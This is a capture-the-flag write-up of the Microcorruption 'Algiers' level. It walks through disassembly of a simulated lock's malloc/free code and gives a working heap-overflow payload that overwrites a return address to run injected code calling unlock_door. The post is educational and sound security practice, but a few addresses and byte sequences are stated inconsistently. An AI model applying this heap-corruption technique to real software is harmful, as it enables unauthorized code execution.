Microcorruption (Embedded Security CTF): Algiers

Next up is the first 100-pointer in Microcorruption:  Algiers.  This level corresponds to a new class of bug.  Previously, we were using printf format attacks, now, we’ll be using use-after-free (UAF) attacks.

Let’s get started by talking about changes to the software at this level, and how I knew what approach to take (sorta 😉).

Updates to the LockIt Pro

When we start the level, we’re presented with release notes.  It talks about how the LockIt Pro Account Manager is able to handle multiple users via the use of PINs assigned to each user.

That didn’t seem to be that relevant to the solution though, so let’s keep looking.

Algiers Microcorruption Software

The first thing I noticed while scrolling through the code was Heap exausted [sic]; aborting. in the strings section.

I also noticed we’ve got malloc and free.  We’ve also got an unconditional unlock_door function:  

The address of this function is 0x4564.  We’ll probably use that later.

Lastly, the main logic of the program (in the login function) looks like this:

463a <login>
463a:  0b12           push	r11
463c:  0a12           push	r10
463e:  3f40 1000      mov	#0x10, r15
4642:  b012 6444      call	#0x4464 <malloc>
4646:  0a4f           mov	r15, r10
4648:  3f40 1000      mov	#0x10, r15
464c:  b012 6444      call	#0x4464 <malloc>
4650:  0b4f           mov	r15, r11
4652:  3f40 9a45      mov	#0x459a, r15
4656:  b012 1a47      call	#0x471a <puts>
465a:  3f40 c845      mov	#0x45c8, r15
465e:  b012 1a47      call	#0x471a <puts>
4662:  3e40 3000      mov	#0x30, r14
4666:  0f4a           mov	r10, r15
4668:  b012 0a47      call	#0x470a <getsn>
466c:  3f40 c845      mov	#0x45c8, r15
4670:  b012 1a47      call	#0x471a <puts>
4674:  3f40 d445      mov	#0x45d4, r15
4678:  b012 1a47      call	#0x471a <puts>
467c:  3e40 3000      mov	#0x30, r14
4680:  0f4b           mov	r11, r15
4682:  b012 0a47      call	#0x470a <getsn>
4686:  0f4b           mov	r11, r15
4688:  b012 7045      call	#0x4570 <test_password_valid>
468c:  0f93           tst	r15
468e:  0524           jz	#0x469a <login+0x60>
4690:  b012 6445      call	#0x4564 <unlock_door>
4694:  3f40 0b46      mov	#0x460b, r15
4698:  023c           jmp	#0x469e <login+0x64>
469a:  3f40 1b46      mov	#0x461b, r15
469e:  b012 1a47      call	#0x471a <puts>
46a2:  0f4b           mov	r11, r15
46a4:  b012 0845      call	#0x4508 <free>
46a8:  0f4a           mov	r10, r15
46aa:  b012 0845      call	#0x4508 <free>
46ae:  3a41           pop	r10
46b0:  3b41           pop	r11
46b2:  3041           ret

We’re going to:

Malloc

You may remember malloc as the mysterious creature from your college “Intro to C” class.  Malloc (memory allocation) is a way of specifying memory dynamically.

Wikipedia talks about how memory can be allocated in C:  statically, automatically, or dynamically.

Static-duration variables are allocated in main memory, usually along with the executable code of the program, and persist for the lifetime of the program; automatic-duration variables are allocated on the stack and come and go as functions are called and return. For static-duration and automatic-duration variables, the size of the allocation must be compile-time constant (except for the case of variable-length automatic arrays5). If the required size is not known until run-time (for example, if data of arbitrary size is being read from the user or from a disk file), then using fixed-size data objects is inadequate.

…Dynamic memory allocation [is a method in which] memory is more explicitly (but more flexibly) managed, typically, by allocating it from the free store (informally called the “heap”), an area of memory structured for this purpose. In C, the library function malloc is used to allocate a block of memory on the heap. The program accesses this block of memory via a pointer that malloc returns. When the memory is no longer needed, the pointer is passed to free which deallocates the memory so that it can be used for other purposes.

To recap:

If we search for a man page, we can see that the function signatures match what we’ve just described:

void *malloc(size_t size);
void free(void *ptr);

C still uses malloc (as opposed to C++ which uses new and free), so unlike gets, it might not be inherently insecure.  We might be able to find an implementation mistake, however.

Some Weird Things

At this point I noticed some weird things, namely:

A quick search through the manual shows nothing for “malloc” or “free” or “heap” so let’s assume there’s nothing particularly unique about this implementation (or at least, the manual hasn’t given us any clues).

Malloc Overflow?

Since we’re allocating less memory space than what we are getting via gets, it seems like there’s possibility for an overflow.  I searched for “malloc overflow” and found this:

The malloc() overflow 11 exploits the heap memory objects allocated via the memory allocator in the GNU C library. The memory allocated by malloc() not only includes the user requested block but also the data used to manage the heap (size of the block, pointer to other blocks and the like). The vulnerability is that a heap variable can be overflowed to overwrite those management data. Exploits based on this technique can bypass stack-based defensive techniques such as StackGuard, StackShield, Libsafe and Solar Designer’s stack patch.

The “pointer to other blocks” has me curious.  I found this presentation, which (among other things) asks the audience to guess how many bytes are allocated for each malloc call (with inputs of 0,

A few slides later, we see that each chunk of memory returned by malloc contains some metadata (in addition to the intended data), namely the size of the previous chunk and the overall size of the current chunk.

When I started writing this blog post (which is to say, when I was taking notes on this level as I was trying to learn/solve it), I had a section called “learning malloc by staring at bits”.  I set breakpoints at 0x463e, 0x4648, and 0x4650, which is before the first malloc, after the first malloc, and after the second malloc.

This is with empty username and password inputs (after both mallocs occur):

You can see some repeated 0824s, as well as other numbers that (also) look like addresses when adjusted for endianness:  241e, 2434, etc.

241e (in location 0x240a) looks like where the first malloc’d block stops.  Similarly, 0x2434 (in location 0x2420) looks like where the second block stops.

Since I know that gets allows us to input more characters than we have room for in our malloc’d location, I entered in AAAABBBBCCCCDDDDDEEEE.  It overwrote some of the 0824 blocks that were shown above:

Let’s take a super quick detour to the end of login where we’ve got a return call that we could (maybe?) reroute.

If we set a breakpoint there, we see that the return value of 0x4440 (which sends us to ‘stop program execution’) is stored at address 0x439a.  Unfortunately, it’s out of reach of our gets input (0x30 for username and 0x30 for password).  

So, where does that leave us?

The presentation I linked to earlier discusses malloc overflows, but within the context of having a function pointer to overwrite.  It would appear that our code is less interesting than that, so let’s keep going in the list and see what other ideas might apply.

Use After Free

Again, from the presentation, Use After Free (UAF) is:

A class of vulnerability where data on the heap is freed, but a leftover reference or ‘dangling pointer’ is used by the code as if the data were still valid

To briefly recap, our program malloc'd 0x10 bytes worth of space for the username and password (each), then gets'd up to 0x30 bytes (each).  That means that we could overflow the username-allocated chunk and overwrite information in the metadata of the password-allocated memory chunk.  Then when we free both chunks, and somehow use the free'd data and maybe execute some bad code?

My notes at this point after many, many strings of different hex-encoded values.  A lot of this was iterative learning-by-doing.  I knew that I needed to overflow the username portion, and that overflow’d part had the ability to overwrite other parts of the data.  But why did that work?

For example, if I type AAAABBBBCCCCDDDDEEEE as a username, which is 4141414142424242434343434444444445454545 in hex-encoding, and let the program continue, I get an error about a load address unaligned at line 0x4520.

If I swap out my 45s with 46s (Fs), then let the program run, I see that two lines of instructions in the 0x4646 block of memory are overwritten:

Again, why does this happen?

Something Amiss in the Free Call

We know that this change happens after the calls to free, so let’s set a breakpoint on line 0x4508.  We also know that the affected (overwritten) instructions correspond to the overflowed input that we’re providing for the username.  Lastly, we know that that area of code used to have 0x2434 in that location, which seems to be a pointer to the end of the second malloc'd block of code.

Again, with an input of AAAABBBBCCCCDDDDFFFF for the username (and whatever/nothing for the password), I wrote up these comments on each instruction of free:

4508 <free>
4508: 0b12 push r11
// after this, r15 has 241e, or the location of the start of the first malloc block.
450a: 3f50 faff add #0xfffa, r15
// this is 0000 (at least for an empty password input)
450e: 1d4f 0400 mov 0x4(r15), r13
// r13 still 0000!
4512: 3df0 feff and #0xfffe, r13
// 0x4(r15)... is still 0000
4516: 8f4d 0400 mov r13, 0x4(r15)
// ah ha! here, r14 gets the value of "4646"
451a: 2e4f mov @r15, r14
// now we're grabbing data from around the 0x4646 memory block.
451c: 1c4e 0400 mov 0x4(r14), r12
// is it a properly aligned address?
4520: 1cb3 bit #0x1, r12
// it is...
4522: 0d20 jnz #0x453e <free+0x36>
// so we continue here and do some math... 0x4(r14) was 0x10, now we have 0x16 in r12.
4524: 3c50 0600 add #0x6, r12
// 0 + 0x16 is 0x16
4528: 0c5d add r13, r12
// now we're putting this new value into back into the location we originally got it from and overwriting 0x4(r14), which is 0x464a
452a: 8e4c 0400 mov r12, 0x4(r14)
// oh cool, now we wrote "0x4646" into location 0x4648.
4534: 1d4f 0200 mov 0x2(r15), r13
// now we've written 0x4646 to location 0x4646
452e: 9e4f 0200 0200 mov 0x2(r15), 0x2(r14)
4538: 8d4e 0000 mov r14, 0x0(r13)
453c: 2f4f mov @r15, r15
// getting the 0x4646...
453e: 1e4f 0200 mov 0x2(r15), r14
// ...and 0x16 values that we just wrote and putting them back into r14 and r13, respectively
4542: 1d4e 0400 mov 0x4(r14), r13
// making sure this is a valid address (lulz)
4546: 1db3 bit #0x1, r13
// it is...
4548: 0b20 jnz #0x4560 <free+0x58>
// doing some more math
454a: 1d5f 0400 add 0x4(r15), r13
454e: 3d50 0600 add #0x6, r13
// and now we're clobbering an address near 0x4646 again (at 0x464a)
4552: 8f4d 0400 mov r13, 0x4(r15)
// and another one (really we're just overwriting the values with the same value)
4556: 9f4e 0200 0200 mov 0x2(r14), 0x2(r15)
// yep
455c: 8e4f 0000 mov r15, 0x0(r14)
4560: 3b41 pop r11
// okay and we're done
4562: 3041 ret

Some takeaways from that:  we can now see how the overwritten messages are getting into the 0x4646 block, because we’re clobbering 3 different addresses.  I tried using this to overwrite some instructions at the end of login by following that address value with the new value I was trying to write.  But, I would always end up shooting myself in the foot by destroying part of the (valid) instructions at the location I wanted to go to, since the instructions and the location are pretty closely coupled.

But, we know that whatever we put in that special (previously) 0x2434 location gives us a portal to changing/overwriting the data at that location.

Normal Free

Having walked through the code step-by-step for an overflowed value, it seems like it’d be useful to walk through it with a non-overflowed value, to understand how free works under normal conditions.

If our username is AAAABBBBCCCCDDDD and our password is aaaabbbbccccdddd, then a pre-first-free looks like this, with the 0x2434 (“end of the second block”) still intact:

In the overflowed case, line 0x451a is where it gets interesting.  Previously, this put 0x4646 into r14, but now it’s just puts 0x2400 which is the beginning of this block of memory.

451a:  2e4f           mov	@r15, r14

By the time both frees are over, that chunk of memory looks like this:

Which is to say that some of our metadata in the 0x2400 block got clobbered.

Bringing this back around to the overflowed case, free is using a pointer to the metadata to update (and “free”) that block of code.  if we’re able to overwrite that pointer, we can then change the values stored at a new location.  Finally, we will use that to reroute program execution back to input of our choosing, which will then be executed.

Algiers Strategy

If you recall, UAF is where the “dangling” pointer (leftover after a free call) is used.

My strategy at this point is to:

  1. Overwrite value 0x4440 at location 0x439a to the location of my input, instead.  This will allow me to return to my code, instead of ending program execution.
  2. I will overwrite this value by overflowing the username input, which means that I’m overwriting a pointer.  When free is called, it will overwrite my location, thinking that it is changing metadata.
  3. I’ll use my password input to have an instruction that says “call the unlock_door” function.   Using the assembler, this instruction will be b012 6445.  (Later, I will change this so that I don’t need a password input at all.  Instead, I’ll put the instructions in my username input).

So let’s get started on that.

Creating the username

For my username, I need 16 bytes of arbitrary data.  I’ll use 90s (no-ops).

username:  90909090909090909090909090909090

Next, I need to add the new address that I’m trying to reroute the program to.  Since I originally did this pointing to the password location, this value is 0x2420.  Later, it will be 0x2410 (within the username block).

username:  909090909090909090909090909090902024

Finally, I need the location of the address that I’m trying to put 0x2420 into.  This is 0x439a.

username:  9090909090909090909090909090909020249a43

Creating the password

The password input is our instruction to call the unlock_door function, but adjusted for the math that happens (add 0x6, etc):

password:  a4126445

This blog post is already getting tediously long but I recommend that you provide this (hex-encoded) username input and step through the input function.

Why this works

This will reroute the program to return to 0x2420 at the end of login, instead of 0x4440.  0x2420, which is part of our recently freed password block of memory, contains instructions (b012 4564) to call the unlock door function.

Of course, after completing this, I checked the rankings.  I saw that other people did it in 20 bytes, whereas I did it in 24 bytes.  I thought that they must have put their assembly instructions within the username, so I improved on my solution.

The b012 4564 assembly needs to go somewhere in the username block.  After we change that, we have to update our username input (the overflow portion) to account for this new location.  Then, we can input nothing for the password.

Part of the username gets clobbered by the “free metadata overwrite” part, so I just repeated the assembly instructions for most of the first 16 bytes:

username:  90909090b0126445b0126445b0126445

The remaining bytes are the new address (0x2410) and then the same 0x493a value.

username: 90909090b0126445b0126445b012644510249a43
password: [nothing]

Microcorruption Algiers Solution

Okay, this has been a loooong blog post.  To solve this level, type solve and then input 90909090b0126445b0126445b012644510249a43 as the username, and nothing for the password. 

This will reroute the program to return to 0x2410 at the end of login, instead of 0x4440 (by overwriting the value at 0x439a).  0x2410, which is part of our recently freed username block of memory, contains instructions (b012 4564) to call the unlock door function.  Ta da!

Hopefully you understand the dangers of memory allocation a little bit better after this post.  Happy hacking!